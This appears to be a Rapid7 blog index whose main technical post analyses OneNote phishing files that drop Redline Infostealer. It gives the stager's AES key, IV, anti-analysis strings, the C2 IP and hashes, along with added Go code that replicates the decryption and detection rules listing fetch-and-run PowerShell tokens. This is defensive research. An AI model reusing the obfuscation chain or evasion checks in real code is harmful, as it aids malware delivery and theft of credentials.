All posts by Rapid7

A Customer Success Manager’s Journey to Cybersecurity

Originally planning to pursue a career in sports journalism, Blake Walters joined Rapid7 ready to roll up his sleeves and learn about an entirely new field—cybersecurity. Walters always had an interest in computer engineering. However, he craved the ability to connect with people and build relationships instead of working deep within coding.

Walters is a learner by nature and is not afraid to take on new challenges or face new risks. Living by the mindset, “If I don’t know, I will work to figure it out,” he began his journey as a recruiter in the technology space. This gave him a great opportunity to learn more about how software is built, which eventually led him to Customer Success, where he could build relationships with customers and help others.

Walters had his first personal brush with cybersecurity when a client he was working with, a small hospital, got hit with Wannacry ransomware in 2017. He became even more curious about cybersecurity as he witnessed firsthand the impact it had on his client.

“You know what cybersecurity is and you know people get hacked all the time, but unless you are in it, you don’t realize the ins and outs of what that impact is,” he said. “There were 4-5 weeks where they couldn’t access hospital records, patient information, company files, ANYTHING. That’s a big challenge for a small hospital, or any company.”

From there, the stars aligned, and Walters was approached with an opportunity to join Rapid7. He noted that during his interview there was less emphasis on having a vast amount of cybersecurity knowledge. Instead, the focus was on his ability to build relationships and proactively use the resources provided by Rapid7 to build the industry knowledge needed to be successful in the role.

According to Walters, joining Rapid7 felt like he had finally found a place where he could do what he loved, while being supported in continuing to learn a new industry and grow his career.

“With cybersecurity, it doesn’t matter what you did yesterday. Hackers are changing all the time. If we aren’t also helping our customers evolve and improve their security over time, we are doing them a disservice,” he said. “That’s why Customer Success is so important. It doesn’t matter how good you’ve been in the past, it’s about how good you’re going to be moving forward. That is an exciting and motivating mindset to have.”

One of the biggest misconceptions about cybersecurity is that you need to have specific knowledge to break into the field. According to Walters, that was not his experience.  

“Everyone has a day 1. You don’t wake up with knowledge of cybersecurity products,” he said. “If you are trying to break into the field, just start reading. There is plenty of information out there. Learn the basics, and then as you’re looking at companies and jobs, start tailoring your understanding of what that company does.”

In an environment where things change so rapidly, it is integral to have an open mind and willingness to adapt. In regard to Rapid7 specifically, Walters believes diversity is key to the company’s success.

“Having different types of people and backgrounds in an organization has a huge impact. It keeps you out of groupthink and lets people collaborate for a common good,” he said. “At Rapid7, that stood out to me early in the interview process. Everyone is challenging one another to be better. That’s what I was looking for in a company regardless of what industry or business it was.”

Overall, Walters wants others out there thinking about entering the cybersecurity space to know that with some effort, you can make it happen. Even without a technical background.

“Don’t be afraid to push yourself outside your comfort zone. I came into this with no cyber experience. It shows the ability of Rapid7 to take a risk on people who are willing to come in, devote themselves to learning and growth, put in the work, and make an impact,” he said. “It’s not about just finding a job, it’s about finding a home.”

To learn more about opportunities available at Rapid7, visit:

Rapid7 Observes Use of Microsoft OneNote to Spread Redline Infostealer Malware

Author: Thomas Elkins
Contributors: Andrew Iwamaye, Matt Green, James Dunne, and Hernan Diaz

Rapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious activity. One objective of this research is to discover new techniques being used in the wild, so we can develop new detection and response capabilities.

Recently, we (Rapid7) observed malicious actors using OneNote files to deliver malicious code. We identified a specific technique that used OneNote files containing batch scripts, which upon execution started an instance of a renamed PowerShell process to decrypt and execute a base64 encoded binary. The base64 encoded binary subsequently decrypted a final payload, which we have identified to be either Redline Infostealer or AsyncRat.

This blog post walks through analysis of a OneNote file that delivered a Redline Infostealer payload.

Analysis of OneNote File

The attack vector began when a user was sent a OneNote file via a phishing email. Once the OneNote file was opened, the user was presented with the option to “Double Click to View File” as seen in Figure 1.

Figure 1 – OneNote file "Remittance" displaying the button “Double Click to View File”

We determined that the button “Double Click to View File” was moveable. Hidden underneath the button, we observed five shortcuts to a batch script, nudm1.bat. The hidden placement of the shortcuts ensured that the user double-clicked on one of the shortcuts when interacting with the “Double Click to View File” button.

Figure 2 – Copy of Batch script nudm1.bat revealed after moving “Double Click to View File” button

Once the user double-clicked the button “Double Click to View File”, the batch script nudm1.bat executed in the background without the user’s knowledge.

Analysis of Batch Script

In a controlled environment, we analyzed the batch script nudm1.bat and observed variables storing values.

Figure 3 – Beginning contents of nudm1.bat

Near the middle of the script, we observed a large section of base64 encoded data, suggesting at some point, the data would be decoded by the batch script.

Figure 4 – Base64 encoded data contained within nudm1.bat

At the bottom of the batch script, we observed the declared variables being concatenated. To easily determine what the script was doing, we placed echo commands in front of the concatenations. The addition of the echo commands allowed for the batch script to deobfuscate itself for us upon execution.

Figure 5 – echo command placed in front of concatenated variables

We executed the batch file and piped the deobfuscated result to a text file. The text file contained a PowerShell script that was executed with a renamed PowerShell binary, nudm1.bat.exe.

Figure 6 – Output after using echo reveals PowerShell script

We determined the script performed the following:

  • Base64 decoded the data stored after :: within nudm1.bat, shown in Figure 4

  • AES Decrypted the base64 decoded data using the base64 Key 4O2hMB9pMchU0WZqwOxI/4wg3/QsmYElktiAnwD4Lqw= and base64 IV of TFfxPAVmUJXw1j++dcSfsQ==

  • Decompressed the decrypted contents using gunzip

  • Reflectively loaded the decrypted and decompressed contents into memory

Using CyberChef, we replicated the identified decryption method to obtain a decrypted executable file.

Figure 7 – AES decryption via CyberChef reveals MZ header

We determined the decrypted file was a 32-bit .NET executable and analyzed the executable using dnSpy.

Analysis of .NET 32-bit Executable

In dnSpy we observed the original file name was tmpFBF7. We also observed that the file contained a resource named payload.exe.

Figure 8 – dnSpy reveals name of original program tmpFBF7 and a payload.exe resource

We navigated to the entry point of the file and observed base64 encoded strings. The base64 encoded strings were passed through a function SRwvjAcHapOsRJfNBFxi. The function SRwvjAcHapOsRJfNBFxi utilized AES decryption to decrypt the data passed to it as an argument.

Figure 9 – AES Decrypt Function SRwvjAcHapOsRJfNBFxi

As seen in Figure 9, the function SRwvjAcHapOsRJfNBFxi took in 3 arguments: input, key and iv.

We replicated the decryption process from the function SRwvjAcHapOsRJfNBFxi using CyberChef to decrypt the values of the base64 encoded strings. Figure 9 shows an example of the decryption process of the base64 encoded string vYhBhJfROLULmQk1P9jbiqyIcg6RWlONx2FLYpdRzZA= from line 30 of Figure 7 to reveal a decoded and decrypted string of CheckRemoteDebuggerPresent.

Figure 10 – Using CyberChef to replicate decryption of function SRwvjAcHapOsRJfNBFxi

Repeating the decryption of the other base64 encoded strings revealed some anti-analysis and anti-AV checks performed by the executable:

  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • AmsiScanBuffer

Other base64 encoded strings include:

  • EtwEventWrite
  • /c choice /c y /n /d y /t 1 & attrib -h -s

After passing the anti-analysis and anti-AV checks, the executable called upon the payload.exe resource in line 94 of the code. We determined that the payload.exe resource was saved into the variable @string.

Figure 11 – @string storing payload.exe

On line 113, the variable @string was passed into a new function, aBTlNnlczOuWxksGYYqb, as well as the AES decryption function SRwvjAcHapOsRJfNBFxi.

Figure 12 – @string being passed through function hDMeRrMMQVtybxerYkHW

The function aBTlNnlczOuWxksGYYqb decompressed content passed to it using Gunzip.

Figure 13 – Function aBTlNnlczOuWxksGYYqb decompresses content using Gzip

Using CyberChef, we decrypted and decompressed the payload.exe resource to obtain another 32-bit .NET executable, which we named payload2.bin. Using YARA, we scanned payload2.bin and determined it was related to the Redline Infostealer malware family.

Figure 14 – YARA signature identifying payload2.bin as Redline Infostealer

We also analyzed payload2.bin in dnSpy.

Analysis of Redline Infostealer

We observed that the original file name of payload2.bin was Footstools and that a class labeled Arguments contained the variables IP and Key. The variable IP stored a base64 encoded value GTwMCik+IV89NmBYISBRLSU7PlMZEiYJKwVVUg==.

Figure 15 – Global variable IP set as Base64 encoded string

The variable Key stored a UTF8 value of Those.

Figure 16 – Global variable Key set with value Those

We identified that the variable IP was used in a call to WriteLine(), which passed the variables IP and Key as arguments to a String.Decrypt function.

Figure 17 – String.Decrypt being passed arguments IP and Key

The function String.Decrypt was a simple function that XOR’ed input data with the value of Key.

Figure 18 – String.Decrypt utilizing XOR decryption

Using Cyberchef, we replicated the String.Decrypt function for the ‘IP’ variable by XORing the base64 value shown in Figure 13 with the value of Key shown in Figure 16 to obtain the decrypted value for the IP variable, 172.245.45[.]213:3235.

Figure 19 – Using XOR in CyberChef to reveal value of argument IP
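The two decryption routines the analysis above replicates in CyberChef, the batch stager’s base64 → AES → gunzip chain (Figure 7) and Redline’s XOR-based String.Decrypt (Figure 18), are written out below as a Go program. It is an added example for this post, not Rapid7 tooling and not code recovered from the sample. It assumes AES-256 in CBC mode with PKCS#7 padding (consistent with the 32-byte key and 16-byte IV lengths the base64 values above decode to, but the mode and padding are not stated on the page), and it builds its own constructed fixture rather than reproducing the sample’s encoded data, key, IV or IP value.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
)

// Stage1Decrypt replicates the stager chain: base64 decode the blob, AES-CBC
// decrypt it with the base64-encoded key and IV, strip PKCS#7 padding, then
// gunzip the result. CBC and PKCS#7 are assumptions, not stated on the page.
func Stage1Decrypt(b64Data, b64Key, b64IV string) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(b64Data)
	if err != nil {
		return nil, fmt.Errorf("data: %w", err)
	}
	key, err := base64.StdEncoding.DecodeString(b64Key)
	if err != nil {
		return nil, fmt.Errorf("key: %w", err)
	}
	iv, err := base64.StdEncoding.DecodeString(b64IV)
	if err != nil {
		return nil, fmt.Errorf("iv: %w", err)
	}
	block, err := aes.NewCipher(key) // a 32-byte key selects AES-256
	if err != nil {
		return nil, err
	}
	if len(iv) != aes.BlockSize || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("IV or ciphertext length is not a multiple of the AES block size")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pt, err = pkcs7Unpad(pt)
	if err != nil {
		return nil, err
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt))
	if err != nil {
		return nil, fmt.Errorf("gunzip: %w", err) // a wrong key or IV usually surfaces here
	}
	defer zr.Close()
	return io.ReadAll(zr)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 {
		return nil, errors.New("empty plaintext")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad PKCS#7 padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad PKCS#7 padding")
		}
	}
	return b[:len(b)-n], nil
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

// IsPE reports whether the recovered bytes start with the MZ header the post
// looks for in Figure 7.
func IsPE(b []byte) bool { return len(b) >= 2 && b[0] == 'M' && b[1] == 'Z' }

// XORDecrypt replicates Redline's String.Decrypt: base64 decode the input,
// then XOR it with the repeating bytes of key.
func XORDecrypt(b64Input, key string) (string, error) {
	if key == "" {
		return "", errors.New("empty key")
	}
	data, err := base64.StdEncoding.DecodeString(b64Input)
	if err != nil {
		return "", err
	}
	for i := range data {
		data[i] ^= key[i%len(key)]
	}
	return string(data), nil
}

// BuildFixture is test scaffolding only: it gzips and AES-CBC encrypts a
// constructed blob so the example runs offline without the real sample.
func BuildFixture(payload, key, iv []byte) (string, error) {
	var gz bytes.Buffer
	zw := gzip.NewWriter(&gz)
	if _, err := zw.Write(payload); err != nil {
		return "", err
	}
	if err := zw.Close(); err != nil {
		return "", err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pt := pkcs7Pad(gz.Bytes())
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(ct), nil
}

func main() {
	key := bytes.Repeat([]byte{0x11}, 32) // constructed key, not the sample's
	iv := bytes.Repeat([]byte{0x22}, 16)  // constructed IV, not the sample's
	payload := []byte("MZ\x90\x00 constructed stand-in for tmpFBF7")
	b64, err := BuildFixture(payload, key, iv)
	if err != nil {
		panic(err)
	}
	got, err := Stage1Decrypt(b64, base64.StdEncoding.EncodeToString(key), base64.StdEncoding.EncodeToString(iv))
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered %d bytes, MZ header present: %v\n", len(got), IsPE(got))
}
```

Because CBC only garbles the first block when the IV is wrong, the padding check can still pass; the gzip magic bytes in that first block are what actually catches a bad key or IV, which is why Stage1Decrypt reports the failure at the gunzip step rather than relying on padding alone.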

Redline Infostealer has the capability to steal credentials related to cryptocurrency wallets, Discord data, as well as web browser data including cached cookies. Figure 19 shows functionality in Redline Infostealer that searches for known cryptocurrency wallets.

Figure 20 – Redline Infostealer parsing for known cryptocurrency wallet locations

Rapid7 Protection

Rapid7 has existing rules that detect the behavior observed within customers’ environments using our Insight Agent, including:

Suspicious Process – Renamed PowerShell

OneNote Embedded File Parser

Rapid7 has also developed a OneNote file parser and detection artifact for Velociraptor. This artifact can be used to detect or extract malicious payloads like the one discussed in this post.


Filename – SHA1 HASH
Rem – 61F9DBE256052D6315361119C7B7330880899D4C
Nudm1.bat – ADCE7CA8C1860E513FB70BCC384237DAE4BC9D26
tmpFBF7.tmp – F6F1C1AB9743E267AC5E998336AF917632D2F8ED
Footstools.exe – 6c404f19ec17609ad3ab375b613ea429e802f063
IP Address – 172.245.45[.]213

MITRE Attack Techniques

TA0002 – Execution

TA0005 – Defense Evasion

TA0006 – Credential Access

TA0007 – Discovery

TA0009 – Collection

TA0011 – Command and Control


  • Block .one attachments at the network perimeter or with an anti-phishing solution if .one files are not business-critical
  • User awareness training
  • If possible, implement signatures to search for PowerShell scripts containing reversed strings such as gnirtS46esaBmorF
  • Watch out for OneNote as the parent process of cmd.exe executing a .bat file
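The last two recommendations, together with the “Renamed PowerShell” rule named under Rapid7 Protection, can be expressed as process-creation checks. The Go program below is an added example, not an Insight Agent rule or Rapid7 code: it runs three rules over constructed process events whose field names follow Sysmon Event ID 1 (ParentImage, Image, OriginalFileName, CommandLine); that schema, the list of sensitive tokens and the sample events are assumptions made for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcessEvent is a minimal process-creation record. Field names follow
// Sysmon Event ID 1; the Insight Agent's own schema is not shown on the page,
// so this layout is an assumption.
type ProcessEvent struct {
	ParentImage      string
	Image            string
	OriginalFileName string // PE version-resource name; survives renaming the file on disk
	CommandLine      string
}

// baseName returns the lower-cased file name of a Windows or POSIX path.
func baseName(p string) string {
	if i := strings.LastIndexAny(p, `\/`); i >= 0 {
		p = p[i+1:]
	}
	return strings.ToLower(p)
}

// OneNoteSpawnsBatch: OneNote is the parent of cmd.exe running a .bat file,
// the delivery step seen with nudm1.bat.
func OneNoteSpawnsBatch(ev ProcessEvent) bool {
	return baseName(ev.ParentImage) == "onenote.exe" &&
		baseName(ev.Image) == "cmd.exe" &&
		strings.Contains(strings.ToLower(ev.CommandLine), ".bat")
}

// RenamedPowerShell: the version resource says powershell.exe but the on-disk
// name differs (nudm1.bat.exe in this campaign).
func RenamedPowerShell(ev ProcessEvent) bool {
	return strings.ToLower(ev.OriginalFileName) == "powershell.exe" &&
		baseName(ev.Image) != "powershell.exe"
}

// sensitiveTokens are .NET/PowerShell names that obfuscated scripts reverse;
// the rule searches for their reversed forms (e.g. gnirtS46esaBmorF).
var sensitiveTokens = []string{"FromBase64String", "DownloadString", "Invoke-Expression"}

func reverse(s string) string {
	b := []byte(s)
	for i, j := 0, len(b)-1; i < j; i, j = i+1, j-1 {
		b[i], b[j] = b[j], b[i]
	}
	return string(b)
}

// ReversedStringTokens returns every reversed sensitive token found in cmd.
func ReversedStringTokens(cmd string) []string {
	var hits []string
	lc := strings.ToLower(cmd)
	for _, tok := range sensitiveTokens {
		if r := reverse(tok); strings.Contains(lc, strings.ToLower(r)) {
			hits = append(hits, r)
		}
	}
	return hits
}

// Evaluate returns the names of all rules an event triggers.
func Evaluate(ev ProcessEvent) []string {
	var hits []string
	if OneNoteSpawnsBatch(ev) {
		hits = append(hits, "onenote_spawns_batch")
	}
	if RenamedPowerShell(ev) {
		hits = append(hits, "renamed_powershell")
	}
	if len(ReversedStringTokens(ev.CommandLine)) > 0 {
		hits = append(hits, "reversed_powershell_strings")
	}
	return hits
}

// SampleEvents are constructed records, not real telemetry.
var SampleEvents = []ProcessEvent{
	{ParentImage: `C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE`,
		Image: `C:\Windows\System32\cmd.exe`, OriginalFileName: "Cmd.Exe",
		CommandLine: `cmd.exe /c "C:\Users\u\AppData\Local\Temp\nudm1.bat"`},
	{ParentImage: `C:\Windows\System32\cmd.exe`,
		Image: `C:\Users\u\AppData\Local\Temp\nudm1.bat.exe`, OriginalFileName: "PowerShell.EXE",
		CommandLine: `nudm1.bat.exe -w hidden -c "$f='gnirtS46esaBmorF'; ..."`},
	{ParentImage: `C:\Windows\explorer.exe`,
		Image: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, OriginalFileName: "PowerShell.EXE",
		CommandLine: `powershell.exe Get-Process`},
}

func main() {
	for i, ev := range SampleEvents {
		fmt.Printf("event %d %-14s -> %v\n", i, baseName(ev.Image), Evaluate(ev))
	}
}
```

The renamed-PowerShell rule keys on OriginalFileName because that value comes from the binary’s version resource, which renaming the file does not change; the OneNote-to-cmd.exe rule will need tuning where legitimate add-ins launch scripts from OneNote.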

The High Cost of Human Error In OT Systems

In baseball, a mistake made by a player that could have easily been avoided is sometimes called an “unforced error.” An unforced error is not an official error (that is, it is not reflected in statistics), but it can result in additional runs being scored, runners getting on base, and even games being lost. This applies in cyber security as well. Threat actors use all sorts of nefarious tactics to target your networks, but they usually can’t succeed without some mistakes from your team.

Rapid7’s partner SCADAfence recently commissioned a survey of 3500 OT professionals. Among the findings, nearly 80% of respondents believe that human error presents the greatest risk for compromise to operational technology (OT) control systems. The survey also found that 83% of respondents believe that there is a significant shortfall in the number of skilled workers. This could contribute to the problem, since under-qualified or improperly trained security workers are more likely to make preventable errors.

Still, many organizations continue to ignore the extremely high potential costs of human error.

Real World Consequences

Last year, SCADAfence argued that an explosion at the Freeport LNG natural gas plant, which a Russian group claimed responsibility for, was actually caused by human error. The timing of the explosion, less than two months after a major maintenance upgrade, and several other factors appear to indicate that improper procedures and a lapse in adherence to company policies were the cause. This was later confirmed by the U.S. Pipeline and Hazardous Materials Safety Administration (PHMSA).

Another example is the Oldsmar Water Facility Attack in 2021. According to reports, human error was a large factor in the attack—in which hackers gained unauthorized access to the water facility’s industrial control system (ICS) network and increased sodium hydroxide content in drinking water to poisonous levels. The Oldsmar facility was using Windows 7, even though Microsoft had stopped supporting it a year earlier. All of Oldsmar’s employees shared the same password to access TeamViewer, a remote access software. And the facility was connected directly to the internet without any type of firewall protection installed. All of these easily preventable factors contributed to the attacker’s ability to gain access to the facility.

Human error in OT systems can take different forms. As stated above, weak, outdated or duplicated passwords have led to any number of cyber security breaches. Firewalls, which are relied on to provide a first line of OT cyber security defense, are frequently misconfigured or improperly deployed by IT staff members. Finally, phishing attacks, a form of social engineering used by malicious actors to gain information from unwitting victims which is then used to access secure systems, are a major starting point for attacks on critical infrastructure.

Rapid7’s Advice

The number one way to prevent human error from leading to costly cyber attacks is training. OT and IT staff should be regularly trained on company security policies and should understand the importance of always following protocol. Also, teams need to work closely together to ensure that proper protections are in place across the network.

There are a number of best practices that have been shown to reduce the frequency and severity of cyber attacks in OT and ICS networks. Organizations should:

  • Require secure passwords that are changed on a regular schedule. Never allow team members to share passwords or access IDs to systems. Each employee that requires access to a system or device should have a unique user name and account.
  • Reduce access privileges to what each role requires.
  • Keep your network updated with important patches and upgrades
  • Make sure the tools your teams rely on are reliable, effective, and up to date.
  • Stay on top of news and information about newly discovered vulnerabilities, and potential threats relevant to your organization.

Finally, if your team lacks bandwidth or necessary skills, consider using managed services to gain insights and relevant threat information about your network.

This article was written in partnership with SCADAfence.

Rapid7 Added to Carahsoft GSA Schedule Contract

We are happy to announce that Rapid7 has been added to Carahsoft’s GSA Schedule contract, making our suite of comprehensive security solutions widely available to Federal, State, and Local agencies through Carahsoft and its reseller partners.

“With the ever-evolving threat landscape, it is important that the public sector has the resources to defend against sophisticated cyber attacks and vulnerabilities,” said Alex Whitworth, Sales Director who leads the Rapid7 Team at Carahsoft.

“The addition of Rapid7’s cloud risk management and threat detection solutions to our GSA Schedule gives Government customers and our reseller partners expansive access to the tools necessary to protect their critical infrastructure.”

With the GSA contract award, Rapid7 is able to significantly expand its availability to Federal, State, Local, and Government markets. In addition to GSA, Rapid7 was recently added to the Department of Homeland Security (DHS) Continuous Diagnostics and Mitigation (CDM) Approved Products List.

“As the attack surface continues to increase in size and complexity, it’s imperative that all organizations have access to the tools and services they need to monitor risk across their environments,” said Damon Cabanillas, Vice President of Public Sector Sales at Rapid7.

“This contract award is a massive step forward for Rapid7 as we work to further serve the public sector.”

Rapid7 is available through Carahsoft’s GSA Schedule No. 47QSWA18D008F. For more information on Rapid7’s products and services, contact the Rapid7 team at Carahsoft at R[email protected].

Rapid7 Now Available Through Carahsoft’s NASPO ValuePoint

We are happy to announce that Rapid7’s solutions have been added to the NASPO ValuePoint Cloud Solutions contract held by Carahsoft Technology Corp. The addition of this contract enables Carahsoft and its reseller partners to provide Rapid7’s Insight platform to participating States, Local Governments, and Educational (SLED) institutions.

“Rapid7’s Insight platform goes beyond threat detection by enabling organizations to quickly respond to attacks with intelligent automation,” said Alex Whitworth, Sales Director who leads the Rapid7 Team at Carahsoft.

“We are thrilled to work with Rapid7 and our reseller partners to deliver these advanced cloud risk management and threat detection solutions to NASPO members to further protect IT environments across the SLED space.”

NASPO ValuePoint is a cooperative purchasing program facilitating public procurement solicitations and agreements using a lead-state model. The program provides the highest standard of excellence in public cooperative contracting. By leveraging the leadership and expertise of all states and the purchasing power of their public entities, NASPO ValuePoint delivers the highest valued, reliable and competitively sourced contracts, offering public entities outstanding prices.

“In partnership with Carahsoft and their reseller partners, we look forward to providing broader availability of the Insight platform to help security teams better protect their organizations from an increasingly complex and volatile threat landscape,” said Damon Cabanillas, Vice President of Public Sector Sales at Rapid7.

The Rapid7 Insight platform is available through Carahsoft’s NASPO ValuePoint Master Agreement #AR2472. For more information, visit

Cloud Security and Compliance Best Practices: Highlights From The CSA Cloud Controls Matrix

In a recent blog post, we highlighted the release of an InsightCloudSec compliance pack, that helps organizations establish and adhere to AWS Foundational Security Best Practices. While that’s a great pack for those who have standardized on AWS and are looking for a trusted set of controls to harden their environment, we know that’s not always the case.

In fact, depending on what report you read, the percentage of organizations that have adopted multiple cloud platforms has soared and continues to rise exponentially. According to Gartner, by 2026 more than 90% of enterprises will extend their capabilities to multi-cloud environments, up from 76% in 2020.

It can be a time- and labor-intensive process to establish and enforce compliance standards across a single cloud environment, but this becomes especially challenging in multi-cloud environments. First, the number of required checks and guardrails is multiplied, and second, because each platform is unique, proper hygiene and security measures aren’t consistent across the various clouds. The general approaches and philosophies are fairly similar, but the way controls are implemented and the way policies are written can be significantly different.

For this post, we’ll dive into one of the most commonly-used cloud security standards for large, multi-cloud environments: the CSA Cloud Controls Matrix (CCM).

What is the CSA Cloud Controls Matrix?

In the unlikely event you’re unfamiliar, Cloud Security Alliance (CSA) is a non-profit organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment. CSA brings together a community of cloud security experts, industry practitioners, associations, governments, and its corporate and individual members to offer cloud security-specific research, education, certification, events and products.

The Cloud Controls Matrix is a comprehensive cybersecurity control framework for cloud computing developed and maintained by CSA. It is widely-used as a systematic assessment of a cloud implementation and provides guidance on which security controls should be implemented within the cloud supply chain. The controls framework is aligned to the CSA Security Guidance for Cloud Computing and is considered a de-facto standard for cloud security assurance and compliance.

Five CSA CCM Principles and Why They’re Important

The CCM consists of many controls and best practices, which means we can’t cover them all in a single blog post. That said, we’ve outlined 5 major principles that logically group the various controls and why they’re important to implement in your cloud environment. Of course, the CCM provides a comprehensive set of specific and actionable directions that, when adopted, simplify the process of adhering to these principles—and many others.

Ensure consistent and proper management of audit logs
Audit logs record the occurrence of an event along with supporting metadata about the event, including the time at which it occurred, the responsible user or service, and the impacted entity or entities. By reviewing audit logs, security teams can investigate breaches and ensure compliance with regulatory requirements. Within CCM, there are a variety of controls focused on ensuring that you’ve got a process in place to collect, retain and analyze logs as well as limiting access and the ability to edit or delete such logs to only those who need it.

Ensure consistent data encryption and proper key management
Ensuring that data is properly encrypted, both at rest and in transit, is a critical step to protect your organization and customer data from unauthorized access. There are a variety of controls within the CCM that are centered around ensuring that data encryption is used consistently and that encryption keys are maintained properly—including regular rotation of keys as applicable.

Effectively manage IAM permissions and abide by Least Privilege Access (LPA)
In modern cloud environments, every user and resource is assigned a unique identity and a set of access permissions and privileges. This can be a challenge to keep track of, especially at scale, which can result in improper access, either from internal users or external malicious actors. To combat this, the CCM provides guidance around establishing processes and mechanisms to manage, track and enforce permissions across the organization. Further, the framework suggests employing the Least Privilege Access (LPA) principle to ensure users only have access to the systems and data that they absolutely need.

Establish and follow a process for managing vulnerabilities
There are a number of controls focused on establishing, implementing and evaluating processes, procedures and technical measures for detecting and remediating vulnerabilities. The CCM has dedicated controls for application vulnerabilities, external library vulnerabilities and host-level vulnerabilities. It is important to regularly scan your cloud environments for known vulnerabilities, and evaluate the processes and methodologies you use to do so, as well.

Define a process to proactively roll back changes to a previous state of good
In traditional, on-premises environments, patching and fixing existing resources is the proper course of action when an error or security concern is discovered. Conversely, when things go awry in cloud environments, remediation steps typically involve reverting back to a previous state of good. To this end, the CCM guides organizations to proactively establish and implement a process that allows them to easily roll back changes to a previously known good state—whether manually or via automation.
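As an added illustration of what checks for three of the principles above look like in code, the Go program below assesses a constructed, provider-neutral resource record for audit-log collection and retention, encryption at rest with key rotation, and least-privilege IAM grants. It is not InsightCloudSec code (the page does not show the compliance-pack check format). The CCM v4 domain codes LOG, CEK and IAM are real, but the record schema and the thresholds (90-day log retention, 365-day key age) are assumptions for the example, not values the CCM prescribes.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// CloudResource is a constructed, provider-neutral snapshot of one resource,
// normalised the way a multi-cloud compliance check would see it.
type CloudResource struct {
	ID               string
	EncryptedAtRest  bool
	KeyLastRotated   time.Time
	AuditLogging     bool
	LogRetentionDays int
	GrantedActions   []string // IAM actions granted to the resource's principal
}

// Finding ties one violation to the CCM v4 domain it falls under.
type Finding struct {
	ResourceID string
	Domain     string // LOG, CEK or IAM
	Detail     string
}

// Thresholds are assumptions for this example, not CCM-prescribed values.
const (
	MaxKeyAge           = 365 * 24 * time.Hour
	MinLogRetentionDays = 90
)

// Assess evaluates one resource at time now and returns every finding.
func Assess(r CloudResource, now time.Time) []Finding {
	var out []Finding
	add := func(domain, detail string) { out = append(out, Finding{r.ID, domain, detail}) }

	// LOG: audit logs must be collected and retained long enough to investigate.
	if !r.AuditLogging {
		add("LOG", "audit logging disabled")
	} else if r.LogRetentionDays < MinLogRetentionDays {
		add("LOG", fmt.Sprintf("log retention %d days is below the %d-day minimum", r.LogRetentionDays, MinLogRetentionDays))
	}

	// CEK: data encrypted at rest, and the key rotated within MaxKeyAge.
	// Rotation is only meaningful when a key exists, so it is skipped otherwise.
	if !r.EncryptedAtRest {
		add("CEK", "data not encrypted at rest")
	} else if age := now.Sub(r.KeyLastRotated); age > MaxKeyAge {
		add("CEK", fmt.Sprintf("encryption key last rotated %d days ago", int(age.Hours()/24)))
	}

	// IAM: least privilege; a wildcard anywhere in an action is a blanket grant.
	for _, a := range r.GrantedActions {
		if strings.Contains(a, "*") {
			add("IAM", "wildcard grant violates least privilege: "+a)
		}
	}
	return out
}

func main() {
	now := time.Now()
	sample := []CloudResource{ // constructed records, not real inventory
		{ID: "bucket-a", EncryptedAtRest: true, KeyLastRotated: now.Add(-400 * 24 * time.Hour),
			AuditLogging: false, GrantedActions: []string{"s3:*", "s3:GetObject"}},
		{ID: "bucket-b", EncryptedAtRest: true, KeyLastRotated: now.Add(-30 * 24 * time.Hour),
			AuditLogging: true, LogRetentionDays: 365, GrantedActions: []string{"s3:GetObject"}},
	}
	for _, r := range sample {
		for _, f := range Assess(r, now) {
			fmt.Printf("%s [%s] %s\n", f.ResourceID, f.Domain, f.Detail)
		}
	}
}
```

Running the same Assess function on a stream of resource snapshots, rather than once, is what turns these checks into the continuous measurement described in the next section: a finding appears the moment a resource is created or changed into a non-compliant state.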

How InsightCloudSec Helps Implement and Enforce CCM

InsightCloudSec allows security teams to establish and continuously measure compliance against organizational policies, whether they’re based on common industry frameworks or customized to specific business needs. This is accomplished through the use of compliance packs.

A compliance pack within InsightCloudSec is a set of checks that can be used to continuously assess your cloud environments for compliance with a given regulatory framework or industry best practices. The platform comes out-of-the-box with 30+ compliance packs, and also offers the ability to build custom compliance packs that are completely tailored to your business’ specific needs.

Whenever a non-compliant resource is created, or when a change is made to an existing resource’s configuration or permissions, InsightCloudSec will detect it within minutes. If you so choose, you can make use of the platform’s native, no-code automation to remediate the issue—either via deletion or by adjusting the configuration and/or permissions—without any human intervention.

If you’re interested in learning more about how InsightCloudSec can help implement and enforce security and compliance standards across your organization, be sure to check out a free demo!

James Alaniz and Ryan Blanchard contributed to this article.

[The Lost Bots] S02E06: Play “Experts or Scuttlebutt?” With Us

As the year winds down, Jeffrey Gardner, Detection and Response Practice Advisor and Stephen Davis, Lead D&R Sales Technical Advisor, collected predictions that were made for 2022, and new ones for 2023. Then, they asked their Rapid7 colleagues to decide if the prediction was made by a cybersecurity expert—or if it was scuttlebutt from, say, Reddit. It’s more interesting than a simple true and false game and appropriate in a world where you need to keep your ear to the ground but be wary of what you hear at the same time.

Play along and see if you beat our winner.

The episode ends with a quick game of “Never Have I Ever.” While some revelations are a bit embarrassing, it’s all safe for work and safe for the kiddies. (You won’t believe who got phished.)

Enjoy your holidays and see you next year.

Additional reading:

Rapid7 Recognized as a Top Place to Work for 11th Consecutive Year

